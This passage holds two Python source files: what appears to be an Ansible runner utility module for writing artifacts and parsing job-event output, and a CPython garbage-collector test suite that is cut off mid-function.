utils.py
import json
import sys
import re
import os
import stat
import fcntl
import shutil
import hashlib
import tempfile
import subprocess
import base64
import threading
import pipes
import uuid
import codecs
import zipfile
try:
from collections.abc import Iterable, Mapping
except ImportError:
from collections import Iterable, Mapping
from io import BytesIO, StringIO
from six import string_types, PY2, PY3, text_type, binary_type
class Bunch(object):
'''
Collect a bunch of variables together in an object.
This is a slight modification of Alex Martelli's and Doug Hudgeon's Bunch pattern.
'''
def __init__(self, **kwargs):
self.update(**kwargs)
def update(self, **kwargs):
self.__dict__.update(kwargs)
def get(self, key):
return self.__dict__.get(key)
def isplaybook(obj):
'''
Inspects the object and returns if it is a playbook
Args:
obj (object): The object to be inspected by this function
Returns:
boolean: True if the object is an iterable of plays (e.g. a list) and False otherwise
'''
return isinstance(obj, Iterable) and (not isinstance(obj, string_types) and not isinstance(obj, Mapping))
def isinventory(obj):
'''
Inspects the object and returns if it is an inventory
Args:
obj (object): The object to be inspected by this function
Returns:
boolean: True if the object is an inventory mapping or an inventory path/string and False otherwise
'''
return isinstance(obj, Mapping) or isinstance(obj, string_types)
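# Illustrative sketch, not part of the original module: how isplaybook() and
# isinventory() classify the common argument shapes (the helper name below is
# hypothetical).
def _example_classify_args():
    assert isplaybook([{'hosts': 'all', 'tasks': []}])       # a list of plays is a playbook
    assert not isplaybook({'hosts': 'all'})                   # a mapping is not a playbook
    assert isinventory({'all': {'hosts': {'web1': None}}})    # dict inventory
    assert isinventory('/etc/ansible/hosts')                  # inventory path or inline INI text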
def check_isolation_executable_installed(isolation_executable):
'''
Check that process isolation executable (e.g. podman, docker, bwrap) is installed.
'''
cmd = [isolation_executable, '--version']
try:
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
proc.communicate()
return bool(proc.returncode == 0)
except (OSError, ValueError) as e:
if isinstance(e, ValueError) or getattr(e, 'errno', 1) != 2: # ENOENT, no such file or directory
raise RuntimeError(f'{isolation_executable} unavailable for unexpected reason.')
return False
def stream_dir(directory):
buf = BytesIO()
with zipfile.ZipFile(buf, 'w', compression=zipfile.ZIP_DEFLATED, allowZip64=True) as archive:
if directory:
for dirpath, dirs, files in os.walk(directory):
relpath = os.path.relpath(dirpath, directory)
if relpath == ".":
relpath = ""
for fname in files:
archive.write(os.path.join(dirpath, fname), arcname=os.path.join(relpath, fname))
archive.close()
payload = buf.getvalue()
return b'\n'.join((json.dumps({'zipfile': len(payload)}).encode('utf-8'), payload))
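# Illustrative sketch, not part of the original module: stream_dir() produces a
# one-line JSON header giving the zip size, a newline, then the raw zip bytes.
# A consumer could unpack that framing roughly like this (helper name is hypothetical).
def _example_unpack_stream(payload):
    header, _, zip_bytes = payload.partition(b'\n')   # the JSON header never contains a newline
    assert json.loads(header)['zipfile'] == len(zip_bytes)
    return zipfile.ZipFile(BytesIO(zip_bytes))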
def dump_artifact(obj, path, filename=None):
'''
Write the artifact to disk at the specified path
Args:
obj (string): The string object to be dumped to disk in the specified
path. The artifact filename will be automatically created
path (string): The full path to the artifacts data directory.
filename (string, optional): The name of file to write the artifact to.
If the filename is not provided, then one will be generated.
Returns:
string: The full path filename for the artifact that was generated
'''
p_sha1 = None
if not os.path.exists(path):
os.makedirs(path, mode=0o700)
else:
p_sha1 = hashlib.sha1()
p_sha1.update(obj.encode(encoding='UTF-8'))
if filename is None:
fd, fn = tempfile.mkstemp(dir=path)
else:
fn = os.path.join(path, filename)
if os.path.exists(fn):
c_sha1 = hashlib.sha1()
with open(fn) as f:
contents = f.read()
c_sha1.update(contents.encode(encoding='UTF-8'))
if not os.path.exists(fn) or p_sha1.hexdigest() != c_sha1.hexdigest():
lock_fp = os.path.join(path, '.artifact_write_lock')
lock_fd = os.open(lock_fp, os.O_RDWR | os.O_CREAT, stat.S_IRUSR | stat.S_IWUSR)
fcntl.lockf(lock_fd, fcntl.LOCK_EX)
try:
with open(fn, 'w') as f:
os.chmod(fn, stat.S_IRUSR)
f.write(str(obj))
finally:
fcntl.lockf(lock_fd, fcntl.LOCK_UN)
os.close(lock_fd)
os.remove(lock_fp)
return fn
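# Illustrative sketch, not part of the original module: dump_artifact() creates the
# directory (mode 0o700) if needed, takes an advisory lock while writing, and returns
# the full path it wrote (helper name and paths below are hypothetical).
def _example_dump_artifact(tmp_dir):
    inventory = {'all': {'hosts': {'localhost': None}}}
    # returns e.g. "<tmp_dir>/inventory/hosts.json"
    return dump_artifact(json.dumps(inventory), os.path.join(tmp_dir, 'inventory'), 'hosts.json')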
def cleanup_artifact_dir(path, num_keep=0):
# 0 disables artifact dir cleanup/rotation
if num_keep < 1:
return
all_paths = sorted([os.path.join(path, p) for p in os.listdir(path)],
key=lambda x: os.path.getmtime(x))
total_remove = len(all_paths) - num_keep
for f in range(total_remove):
shutil.rmtree(all_paths[f])
def dump_artifacts(kwargs):
'''
Introspect the kwargs and dump objects to disk
'''
private_data_dir = kwargs.get('private_data_dir')
if not private_data_dir:
private_data_dir = tempfile.mkdtemp()
kwargs['private_data_dir'] = private_data_dir
if not os.path.exists(private_data_dir):
raise ValueError('private_data_dir path is either invalid or does not exist')
if 'role' in kwargs:
role = {'name': kwargs.pop('role')}
if 'role_vars' in kwargs:
role['vars'] = kwargs.pop('role_vars')
play = [{'hosts': kwargs.pop('hosts', 'all'), 'roles': [role]}]
if kwargs.pop('role_skip_facts', False):
play[0]['gather_facts'] = False
kwargs['playbook'] = play
if 'envvars' not in kwargs:
kwargs['envvars'] = {}
roles_path = kwargs.pop('roles_path', None)
if not roles_path:
roles_path = os.path.join(private_data_dir, 'roles')
else:
roles_path += ':{}'.format(os.path.join(private_data_dir, 'roles'))
kwargs['envvars']['ANSIBLE_ROLES_PATH'] = roles_path
obj = kwargs.get('playbook')
if obj and isplaybook(obj):
path = os.path.join(private_data_dir, 'project')
kwargs['playbook'] = dump_artifact(json.dumps(obj), path, 'main.json')
obj = kwargs.get('inventory')
if obj and isinventory(obj):
path = os.path.join(private_data_dir, 'inventory')
if isinstance(obj, Mapping):
kwargs['inventory'] = dump_artifact(json.dumps(obj), path, 'hosts.json')
elif isinstance(obj, string_types):
if not os.path.exists(obj):
kwargs['inventory'] = dump_artifact(obj, path, 'hosts')
for key in ('envvars', 'extravars', 'passwords', 'settings'):
obj = kwargs.get(key)
if obj and not os.path.exists(os.path.join(private_data_dir, 'env', key)):
path = os.path.join(private_data_dir, 'env')
dump_artifact(json.dumps(obj), path, key)
kwargs.pop(key)
for key in ('ssh_key', 'cmdline'):
obj = kwargs.get(key)
if obj and not os.path.exists(os.path.join(private_data_dir, 'env', key)):
path = os.path.join(private_data_dir, 'env')
dump_artifact(str(kwargs[key]), path, key)
kwargs.pop(key)
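# Illustrative sketch, not part of the original module: dump_artifacts() mutates the
# kwargs dict in place, materialising in-memory objects as files under
# private_data_dir (helper name below is hypothetical).
def _example_dump_artifacts():
    kwargs = {
        'playbook': [{'hosts': 'all', 'tasks': [{'ping': None}]}],
        'inventory': {'all': {'hosts': {'localhost': None}}},
        'extravars': {'greeting': 'hello'},
    }
    dump_artifacts(kwargs)
    # kwargs['playbook'] and kwargs['inventory'] now hold file paths under
    # kwargs['private_data_dir'], and 'extravars' was written to env/extravars
    # and removed from kwargs.
    return kwargs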
def collect_new_events(event_path, old_events):
'''
Collect new events for the 'events' generator property
'''
dir_events = os.listdir(event_path)
dir_events_actual = []
for each_file in dir_events:
if re.match("^[0-9]+-.+json$", each_file):
if '-partial' not in each_file and each_file not in old_events.keys() :
dir_events_actual.append(each_file)
dir_events_actual.sort(key=lambda filenm: int(filenm.split("-", 1)[0]))
for event_file in dir_events_actual:
with codecs.open(os.path.join(event_path, event_file), 'r', encoding='utf-8') as event_file_actual:
try:
event = json.load(event_file_actual)
except ValueError:
break
old_events[event_file] = True
yield event, old_events
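# Illustrative sketch, not part of the original module: collect_new_events() yields
# (event, seen) pairs for each completed "<number>-<id>.json" event file it has not
# reported before; callers pass the same dict back on the next poll (helper name is
# hypothetical).
def _example_poll_events(event_path):
    seen = {}
    for event, seen in collect_new_events(event_path, seen):
        print(event.get('event'), event.get('counter'))
    return seen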
class OutputEventFilter(object):
'''
File-like object that looks for encoded job events in stdout data.
'''
EVENT_DATA_RE = re.compile(r'\x1b\[K((?:[A-Za-z0-9+/=]+\x1b\[\d+D)+)\x1b\[K')
def __init__(self, handle, event_callback,
suppress_ansible_output=False, output_json=False):
self._event_callback = event_callback
self._counter = 0
self._start_line = 0
self._handle = handle
self._buffer = StringIO()
self._last_chunk = ''
self._current_event_data = None
self.output_json = output_json
self.suppress_ansible_output = suppress_ansible_output
def flush(self):
self._handle.flush()
def write(self, data):
self._buffer.write(data)
# keep a sliding window of the last chunk written so we can detect
# event tokens and determine if we need to perform a search of the full
# buffer
should_search = '\x1b[K' in (self._last_chunk + data)
self._last_chunk = data
# Only bother searching the buffer if we recently saw a start/end
# token (\x1b[K)
while should_search:
value = self._buffer.getvalue()
match = self.EVENT_DATA_RE.search(value)
if not match:
break
try:
base64_data = re.sub(r'\x1b\[\d+D', '', match.group(1))
event_data = json.loads(base64.b64decode(base64_data).decode('utf-8'))
except ValueError:
event_data = {}
event_data = self._emit_event(value[:match.start()], event_data)
if not self.output_json:
stdout_actual = event_data['stdout'] if 'stdout' in event_data else None
else:
stdout_actual = json.dumps(event_data)
remainder = value[match.end():]
self._buffer = StringIO()
self._buffer.write(remainder)
if stdout_actual and stdout_actual != "{}":
if not self.suppress_ansible_output:
sys.stdout.write(
stdout_actual.encode('utf-8') if PY2 else stdout_actual
)
sys.stdout.write("\n")
sys.stdout.flush()
self._handle.write(stdout_actual + "\n")
self._handle.flush()
self._last_chunk = remainder
else:
# Verbose stdout outside of event data context
if data and '\n' in data and self._current_event_data is None:
# emit events for all complete lines we know about
lines = self._buffer.getvalue().splitlines(True) # keep ends
remainder = None
# if last line is not a complete line, then exclude it
if '\n' not in lines[-1]:
remainder = lines.pop()
# emit all complete lines
for line in lines:
self._emit_event(line)
if not self.suppress_ansible_output:
sys.stdout.write(
line.encode('utf-8') if PY2 else line
)
self._handle.write(line)
self._handle.flush()
self._buffer = StringIO()
# put final partial line back on buffer
if remainder:
self._buffer.write(remainder)
def close(self):
value = self._buffer.getvalue()
if value:
self._emit_event(value)
self._buffer = StringIO()
self._event_callback(dict(event='EOF'))
self._handle.close()
def _emit_event(self, buffered_stdout, next_event_data=None):
next_event_data = next_event_data or {}
if self._current_event_data:
event_data = self._current_event_data
stdout_chunks = [buffered_stdout]
elif buffered_stdout:
event_data = dict(event='verbose')
stdout_chunks = buffered_stdout.splitlines(True)
else:
event_data = dict()
stdout_chunks = []
for stdout_chunk in stdout_chunks:
if event_data.get('event') == 'verbose':
event_data['uuid'] = str(uuid.uuid4())
self._counter += 1
event_data['counter'] = self._counter
event_data['stdout'] = stdout_chunk[:-2] if len(stdout_chunk) > 2 else ""
n_lines = stdout_chunk.count('\n')
event_data['start_line'] = self._start_line
event_data['end_line'] = self._start_line + n_lines
self._start_line += n_lines
if self._event_callback:
self._event_callback(event_data)
if next_event_data.get('uuid', None):
self._current_event_data = next_event_data
else:
self._current_event_data = None
return event_data
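# Illustrative sketch, not part of the original module: job events arrive on stdout as
# base64-encoded JSON wrapped in "\x1b[K ... \x1b[K" markers (with a cursor-left escape
# after each base64 chunk). Writing such a token makes the decoded dict the pending
# event; stdout written afterwards is attributed to it and flushed on close().
# The helper name and sample event below are hypothetical.
def _example_event_token():
    events = []
    data = {'uuid': str(uuid.uuid4()), 'event': 'runner_on_ok'}
    encoded = base64.b64encode(json.dumps(data).encode('utf-8')).decode('ascii')
    token = '\x1b[K' + encoded + '\x1b[%dD' % len(encoded) + '\x1b[K'
    filt = OutputEventFilter(StringIO(), events.append, suppress_ansible_output=True)
    filt.write(token)                  # decoded dict becomes the current event
    filt.write('ok: [localhost]\n')    # stdout belonging to that event
    filt.close()                       # flushes the pending event, then emits EOF
    return events                      # [runner_on_ok event with stdout, {'event': 'EOF'}]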
def open_fifo_write(path, data):
'''open_fifo_write opens the fifo named pipe in a new thread.
This blocks the thread until an external process (such as ssh-agent)
reads data from the pipe.
'''
os.mkfifo(path, stat.S_IRUSR | stat.S_IWUSR)
threading.Thread(target=lambda p, d: open(p, 'wb').write(d),
args=(path, data)).start()
def args2cmdline(*args):
return ' '.join([pipes.quote(a) for a in args])
def ensure_str(s, encoding='utf-8', errors='strict'):
"""
Copied from six==1.12
Coerce *s* to `str`.
For Python 2:
- `unicode` -> encoded to `str`
- `str` -> `str`
For Python 3:
- `str` -> `str`
- `bytes` -> decoded to `str`
"""
if not isinstance(s, (text_type, binary_type)):
raise TypeError("not expecting type '%s'" % type(s))
if PY2 and isinstance(s, text_type):
s = s.encode(encoding, errors)
elif PY3 and isinstance(s, binary_type):
s = s.decode(encoding, errors)
return s
def sanitize_container_name(original_name):
"""
Docker and podman will only accept certain characters in container names
This takes a given name from user-specified values and replaces the
invalid characters so it can be used in docker/podman CLI commands
"""
return re.sub('[^a-zA-Z0-9_-]', '_', text_type(original_name))
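# Illustrative sketch, not part of the original module: shell quoting and container
# name sanitising (helper name below is hypothetical).
def _example_quoting():
    assert args2cmdline('ansible-playbook', '-e', 'greeting=hello world') == \
        "ansible-playbook -e 'greeting=hello world'"
    assert sanitize_container_name('runner@job#42') == 'runner_job_42'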
test_gc.py
import unittest
import unittest.mock
from test.support import (verbose, refcount_test, run_unittest,
cpython_only, start_threads,
temp_dir, TESTFN, unlink,
import_module)
from test.support.script_helper import assert_python_ok, make_script
import gc
import sys
import sysconfig
import textwrap
import threading
import time
import weakref
try:
from _testcapi import with_tp_del
except ImportError:
def with_tp_del(cls):
class C(object):
def __new__(cls, *args, **kwargs):
raise TypeError('requires _testcapi.with_tp_del')
return C
try:
from _testcapi import ContainerNoGC
except ImportError:
ContainerNoGC = None
### Support code
###############################################################################
# Bug 1055820 has several tests of longstanding bugs involving weakrefs and
# cyclic gc.
# An instance of C1055820 has a self-loop, so becomes cyclic trash when
# unreachable.
class C1055820(object):
def __init__(self, i):
self.i = i
self.loop = self
class GC_Detector(object):
# Create an instance I. Then gc hasn't happened again so long as
# I.gc_happened is false.
def __init__(self):
self.gc_happened = False
def it_happened(ignored):
self.gc_happened = True
# Create a piece of cyclic trash that triggers it_happened when
# gc collects it.
self.wr = weakref.ref(C1055820(666), it_happened)
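# Illustrative sketch, not part of the original test suite: the GC_Detector idiom used
# below. With automatic collection enabled, allocating throwaway objects eventually
# triggers a collection, which reclaims the detector's cyclic C1055820 trash and fires
# its weakref callback (helper name below is hypothetical).
def _example_wait_for_gc(limit=10000):
    detector = GC_Detector()
    junk = []
    while not detector.gc_happened and len(junk) < limit:
        junk.append([])
    return detector.gc_happened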
@with_tp_del
class Uncollectable(object):
"""Create a reference cycle with multiple __del__ methods.
An object in a reference cycle will never have zero references,
and so must be garbage collected. If one or more objects in the
cycle have __del__ methods, the gc refuses to guess an order,
and leaves the cycle uncollected."""
def __init__(self, partner=None):
if partner is None:
self.partner = Uncollectable(partner=self)
else:
self.partner = partner
def __tp_del__(self):
pass
if sysconfig.get_config_vars().get('PY_CFLAGS', ''):
BUILD_WITH_NDEBUG = ('-DNDEBUG' in sysconfig.get_config_vars()['PY_CFLAGS'])
else:
# Usually, sys.gettotalrefcount() is only present if Python has been
# compiled in debug mode. If it's missing, expect that Python has
# been released in release mode: with NDEBUG defined.
BUILD_WITH_NDEBUG = (not hasattr(sys, 'gettotalrefcount'))
### Tests
###############################################################################
class GCTests(unittest.TestCase):
def test_list(self):
l = []
l.append(l)
gc.collect()
del l
self.assertEqual(gc.collect(), 1)
def test_dict(self):
d = {}
d[1] = d
gc.collect()
del d
self.assertEqual(gc.collect(), 1)
def test_tuple(self):
# since tuples are immutable we close the loop with a list
l = []
t = (l,)
l.append(t)
gc.collect()
del t
del l
self.assertEqual(gc.collect(), 2)
def test_class(self):
class A:
pass
A.a = A
gc.collect()
del A
self.assertNotEqual(gc.collect(), 0)
def test_newstyleclass(self):
class A(object):
pass
gc.collect()
del A
self.assertNotEqual(gc.collect(), 0)
def test_instance(self):
class A:
pass
a = A()
a.a = a
gc.collect()
del a
self.assertNotEqual(gc.collect(), 0)
def test_newinstance(self):
class A(object):
pass
a = A()
a.a = a
gc.collect()
del a
self.assertNotEqual(gc.collect(), 0)
class B(list):
pass
class C(B, A):
pass
a = C()
a.a = a
gc.collect()
del a
self.assertNotEqual(gc.collect(), 0)
del B, C
self.assertNotEqual(gc.collect(), 0)
A.a = A()
del A
self.assertNotEqual(gc.collect(), 0)
self.assertEqual(gc.collect(), 0)
def test_method(self):
# Tricky: self.__init__ is a bound method, it references the instance.
class A:
def __init__(self):
self.init = self.__init__
a = A()
gc.collect()
del a
self.assertNotEqual(gc.collect(), 0)
@cpython_only
def test_legacy_finalizer(self):
# A() is uncollectable if it is part of a cycle, make sure it shows up
# in gc.garbage.
@with_tp_del
class A:
def __tp_del__(self): pass
class B:
pass
a = A()
a.a = a
id_a = id(a)
b = B()
b.b = b
gc.collect()
del a
del b
self.assertNotEqual(gc.collect(), 0)
for obj in gc.garbage:
if id(obj) == id_a:
del obj.a
break
else:
self.fail("didn't find obj in garbage (finalizer)")
gc.garbage.remove(obj)
@cpython_only
def test_legacy_finalizer_newclass(self):
# A() is uncollectable if it is part of a cycle, make sure it shows up
# in gc.garbage.
@with_tp_del
class A(object):
def __tp_del__(self): pass
class B(object):
pass
a = A()
a.a = a
id_a = id(a)
b = B()
b.b = b
gc.collect()
del a
del b
self.assertNotEqual(gc.collect(), 0)
for obj in gc.garbage:
if id(obj) == id_a:
del obj.a
break
else:
self.fail("didn't find obj in garbage (finalizer)")
gc.garbage.remove(obj)
def test_function(self):
# Tricky: f -> d -> f, code should call d.clear() after the exec to
# break the cycle.
d = {}
exec("def f(): pass\n", d)
gc.collect()
del d
self.assertEqual(gc.collect(), 2)
@refcount_test
def test_frame(self):
def f():
frame = sys._getframe()
gc.collect()
f()
self.assertEqual(gc.collect(), 1)
def test_saveall(self):
# Verify that cyclic garbage like lists show up in gc.garbage if the
# SAVEALL option is enabled.
# First make sure we don't save away other stuff that just happens to
# be waiting for collection.
gc.collect()
# if this fails, someone else created immortal trash
self.assertEqual(gc.garbage, [])
L = []
L.append(L)
id_L = id(L)
debug = gc.get_debug()
gc.set_debug(debug | gc.DEBUG_SAVEALL)
del L
gc.collect()
gc.set_debug(debug)
self.assertEqual(len(gc.garbage), 1)
obj = gc.garbage.pop()
self.assertEqual(id(obj), id_L)
def test_del(self):
# __del__ methods can trigger collection; make sure this happens
thresholds = gc.get_threshold()
gc.enable()
gc.set_threshold(1)
class A:
def __del__(self):
dir(self)
a = A()
del a
gc.disable()
gc.set_threshold(*thresholds)
def test_del_newclass(self):
# __del__ methods can trigger collection; make sure this happens
thresholds = gc.get_threshold()
gc.enable()
gc.set_threshold(1)
class A(object):
def __del__(self):
dir(self)
a = A()
del a
gc.disable()
gc.set_threshold(*thresholds)
# The following two tests are fragile:
# They precisely count the number of allocations,
# which is highly implementation-dependent.
# For example, disposed tuples are not freed, but reused.
# To minimize variations, though, we first store the get_count() results
# and check them at the end.
@refcount_test
def test_get_count(self):
gc.collect()
a, b, c = gc.get_count()
x = []
d, e, f = gc.get_count()
self.assertEqual((b, c), (0, 0))
self.assertEqual((e, f), (0, 0))
# This is less fragile than asserting that a equals 0.
self.assertLess(a, 5)
# Between the two calls to get_count(), at least one object was
# created (the list).
self.assertGreater(d, a)
@refcount_test
def test_collect_generations(self):
gc.collect()
# This object will "trickle" into generation N + 1 after
# each call to collect(N)
x = []
gc.collect(0)
# x is now in gen 1
a, b, c = gc.get_count()
gc.collect(1)
# x is now in gen 2
d, e, f = gc.get_count()
gc.collect(2)
# x is now in the oldest generation (gen 2)
g, h, i = gc.get_count()
# We don't check a, d, g since their exact values depend on
# internal implementation details of the interpreter.
self.assertEqual((b, c), (1, 0))
self.assertEqual((e, f), (0, 1))
self.assertEqual((h, i), (0, 0))
def test_trashcan(self):
class Ouch:
n = 0
def __del__(self):
Ouch.n = Ouch.n + 1
if Ouch.n % 17 == 0:
gc.collect()
# "trashcan" is a hack to prevent stack overflow when deallocating
# very deeply nested tuples etc. It works in part by abusing the
# type pointer and refcount fields, and that can yield horrible
# problems when gc tries to traverse the structures.
# If this test fails (as it does in 2.0, 2.1 and 2.2), it will
# most likely die via segfault.
# Note: In 2.3 the possibility for compiling without cyclic gc was
# removed, and that in turn allows the trashcan mechanism to work
# via much simpler means (e.g., it never abuses the type pointer or
# refcount fields anymore). Since it's much less likely to cause a
# problem now, the various constants in this expensive (we force a lot
# of full collections) test are cut back from the 2.2 version.
gc.enable()
N = 150
for count in range(2):
t = []
for i in range(N):
t = [t, Ouch()]
u = []
for i in range(N):
u = [u, Ouch()]
v = {}
for i in range(N):
v = {1: v, 2: Ouch()}
gc.disable()
def test_trashcan_threads(self):
# Issue #13992: trashcan mechanism should be thread-safe
NESTING = 60
N_THREADS = 2
def sleeper_gen():
"""A generator that releases the GIL when closed or dealloc'ed."""
try:
yield
finally:
time.sleep(0.000001)
class C(list):
# Appending to a list is atomic, which avoids the use of a lock.
inits = []
dels = []
def __init__(self, alist):
self[:] = alist
C.inits.append(None)
def __del__(self):
# This __del__ is called by subtype_dealloc().
C.dels.append(None)
# `g` will release the GIL when garbage-collected. This
# helps assert subtype_dealloc's behaviour when threads
# switch in the middle of it.
g = sleeper_gen()
next(g)
# Now that __del__ is finished, subtype_dealloc will proceed
# to call list_dealloc, which also uses the trashcan mechanism.
def make_nested():
"""Create a sufficiently nested container object so that the
trashcan mechanism is invoked when deallocating it."""
x = C([])
for i in range(NESTING):
x = [C([x])]
del x
def run_thread():
"""Exercise make_nested() in a loop."""
while not exit:
make_nested()
old_switchinterval = sys.getswitchinterval()
sys.setswitchinterval(1e-5)
try:
exit = []
threads = []
for i in range(N_THREADS):
t = threading.Thread(target=run_thread)
threads.append(t)
with start_threads(threads, lambda: exit.append(1)):
time.sleep(1.0)
finally:
sys.setswitchinterval(old_switchinterval)
gc.collect()
self.assertEqual(len(C.inits), len(C.dels))
def test_boom(self):
class Boom:
def __getattr__(self, someattribute):
del self.attr
raise AttributeError
a = Boom()
b = Boom()
a.attr = b
b.attr = a
gc.collect()
garbagelen = len(gc.garbage)
del a, b
# a<->b are in a trash cycle now. Collection will invoke
# Boom.__getattr__ (to see whether a and b have __del__ methods), and
# __getattr__ deletes the internal "attr" attributes as a side effect.
# That causes the trash cycle to get reclaimed via refcounts falling to
# 0, thus mutating the trash graph as a side effect of merely asking
# whether __del__ exists. This used to (before 2.3b1) crash Python.
# Now __getattr__ isn't called.
self.assertEqual(gc.collect(), 4)
self.assertEqual(len(gc.garbage), garbagelen)
def test_boom2(self):
class Boom2:
def __init__(self):
self.x = 0
def __getattr__(self, someattribute):
self.x += 1
if self.x > 1:
del self.attr
raise AttributeError
a = Boom2()
b = Boom2()
a.attr = b
b.attr = a
gc.collect()
garbagelen = len(gc.garbage)
del a, b
# Much like test_boom(), except that __getattr__ doesn't break the
# cycle until the second time gc checks for __del__. As of 2.3b1,
# there isn't a second time, so this simply cleans up the trash cycle.
# We expect a, b, a.__dict__ and b.__dict__ (4 objects) to get
# reclaimed this way.
self.assertEqual(gc.collect(), 4)
self.assertEqual(len(gc.garbage), garbagelen)
def test_boom_new(self):
# boom__new and boom2_new are exactly like boom and boom2, except use
# new-style classes.
class Boom_New(object):
def __getattr__(self, someattribute):
del self.attr
raise AttributeError
a = Boom_New()
b = Boom_New()
a.attr = b
b.attr = a
gc.collect()
garbagelen = len(gc.garbage)
del a, b
self.assertEqual(gc.collect(), 4)
self.assertEqual(len(gc.garbage), garbagelen)
def test_boom2_new(self):
class Boom2_New(object):
def __init__(self):
self.x = 0
def __getattr__(self, someattribute):
self.x += 1
if self.x > 1:
del self.attr
raise AttributeError
a = Boom2_New()
b = Boom2_New()
a.attr = b
b.attr = a
gc.collect()
garbagelen = len(gc.garbage)
del a, b
self.assertEqual(gc.collect(), 4)
self.assertEqual(len(gc.garbage), garbagelen)
def test_get_referents(self):
alist = [1, 3, 5]
got = gc.get_referents(alist)
got.sort()
self.assertEqual(got, alist)
atuple = tuple(alist)
got = gc.get_referents(atuple)
got.sort()
self.assertEqual(got, alist)
adict = {1: 3, 5: 7}
expected = [1, 3, 5, 7]
got = gc.get_referents(adict)
got.sort()
self.assertEqual(got, expected)
got = gc.get_referents([1, 2], {3: 4}, (0, 0, 0))
got.sort()
self.assertEqual(got, [0, 0] + list(range(5)))
self.assertEqual(gc.get_referents(1, 'a', 4j), [])
def test_is_tracked(self):
# Atomic built-in types are not tracked, user-defined objects and
# mutable containers are.
# NOTE: types with special optimizations (e.g. tuple) have tests
# in their own test files instead.
self.assertFalse(gc.is_tracked(None))
self.assertFalse(gc.is_tracked(1))
self.assertFalse(gc.is_tracked(1.0))
self.assertFalse(gc.is_tracked(1.0 + 5.0j))
self.assertFalse(gc.is_tracked(True))
self.assertFalse(gc.is_tracked(False))
self.assertFalse(gc.is_tracked(b"a"))
self.assertFalse(gc.is_tracked("a"))
self.assertFalse(gc.is_tracked(bytearray(b"a")))
self.assertFalse(gc.is_tracked(type))
self.assertFalse(gc.is_tracked(int))
self.assertFalse(gc.is_tracked(object))
self.assertFalse(gc.is_tracked(object()))
class UserClass:
pass
class UserInt(int):
pass
# Base class is object; no extra fields.
class UserClassSlots:
__slots__ = ()
# Base class is fixed size larger than object; no extra fields.
class UserFloatSlots(float):
__slots__ = ()
# Base class is variable size; no extra fields.
class UserIntSlots(int):
__slots__ = ()
self.assertTrue(gc.is_tracked(gc))
self.assertTrue(gc.is_tracked(UserClass))
self.assertTrue(gc.is_tracked(UserClass()))
self.assertTrue(gc.is_tracked(UserInt()))
self.assertTrue(gc.is_tracked([]))
self.assertTrue(gc.is_tracked(set()))
self.assertTrue(gc.is_tracked(UserClassSlots()))
self.assertTrue(gc.is_tracked(UserFloatSlots()))
self.assertTrue(gc.is_tracked(UserIntSlots()))
def test_is_finalized(self):
# Objects not tracked by the gc always return false
self.assertFalse(gc.is_finalized(3))
storage = []
class Lazarus:
def __del__(self):
storage.append(self)
lazarus = Lazarus()
self.assertFalse(gc.is_finalized(lazarus))
del lazarus
gc.collect()
lazarus = storage.pop()
self.assertTrue(gc.is_finalized(lazarus))
def test_bug1055820b(self):
# Corresponds to temp2b.py in the bug report.
ouch = []
def callback(ignored):
ouch[:] = [wr() for wr in WRs]
Cs = [C1055820(i) for i in range(2)]
WRs = [weakref.ref(c, callback) for c in Cs]
c = None
gc.collect()
self.assertEqual(len(ouch), 0)
# Make the two instances trash, and collect again. The bug was that
# the callback materialized a strong reference to an instance, but gc
# cleared the instance's dict anyway.
Cs = None
gc.collect()
self.assertEqual(len(ouch), 2) # else the callbacks didn't run
for x in ouch:
# If the callback resurrected one of these guys, the instance
# would be damaged, with an empty __dict__.
self.assertEqual(x, None)
def test_bug21435(self):
# This is a poor test - its only virtue is that it happened to
# segfault on Tim's Windows box before the patch for 21435 was
# applied. That's a nasty bug relying on specific pieces of cyclic
# trash appearing in exactly the right order in finalize_garbage()'s
# input list.
# But there's no reliable way to force that order from Python code,
# so over time chances are good this test won't really be testing much
# of anything anymore. Still, if it blows up, there's _some_
# problem ;-)
gc.collect()
class A:
pass
class B:
def __init__(self, x):
self.x = x
def __del__(self):
self.attr = None
def do_work():
a = A()
b = B(A())
a.attr = b
b.attr = a
do_work()
gc.collect() # this blows up (bad C pointer) when it fails
@cpython_only
def test_garbage_at_shutdown(self):
import subprocess
code = """if 1:
import gc
import _testcapi
@_testcapi.with_tp_del
class X:
def __init__(self, name):
self.name = name
def __repr__(self):
return "<X %%r>" %% self.name
def __tp_del__(self):
pass
x = X('first')
x.x = x
x.y = X('second')
del x
gc.set_debug(%s)
"""
def run_command(code):
p = subprocess.Popen([sys.executable, "-Wd", "-c", code],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
p.stdout.close()
p.stderr.close()
self.assertEqual(p.returncode, 0)
self.assertEqual(stdout, b"")
return stderr
stderr = run_command(code % "0")
self.assertIn(b"ResourceWarning: gc: 2 uncollectable objects at "
b"shutdown; use", stderr)
self.assertNotIn(b"<X 'first'>", stderr)
# With DEBUG_UNCOLLECTABLE, the garbage list gets printed
stderr = run_command(code % "gc.DEBUG_UNCOLLECTABLE")
self.assertIn(b"ResourceWarning: gc: 2 uncollectable objects at "
b"shutdown", stderr)
self.assertTrue(
(b"[<X 'first'>, <X 'second'>]" in stderr) or
(b"[<X 'second'>, <X 'first'>]" in stderr), stderr)
# With DEBUG_SAVEALL, no additional message should get printed
# (because gc.garbage also contains normally reclaimable cyclic
# references, and its elements get printed at runtime anyway).
stderr = run_command(code % "gc.DEBUG_SAVEALL")
self.assertNotIn(b"uncollectable objects at shutdown", stderr)
def test_gc_main_module_at_shutdown(self):
# Create a reference cycle through the __main__ module and check
# it gets collected at interpreter shutdown.
code = """if 1:
class C:
def __del__(self):
print('__del__ called')
l = [C()]
l.append(l)
"""
rc, out, err = assert_python_ok('-c', code)
self.assertEqual(out.strip(), b'__del__ called')
def test_gc_ordinary_module_at_shutdown(self):
# Same as above, but with a non-__main__ module.
with temp_dir() as script_dir:
module = """if 1:
class C:
def __del__(self):
print('__del__ called')
l = [C()]
l.append(l)
"""
code = """if 1:
import sys
sys.path.insert(0, %r)
import gctest
""" % (script_dir,)
make_script(script_dir, 'gctest', module)
rc, out, err = assert_python_ok('-c', code)
self.assertEqual(out.strip(), b'__del__ called')
def test_global_del_SystemExit(self):
code = """if 1:
class ClassWithDel:
def __del__(self):
print('__del__ called')
a = ClassWithDel()
a.link = a
raise SystemExit(0)"""
self.addCleanup(unlink, TESTFN)
with open(TESTFN, 'w') as script:
script.write(code)
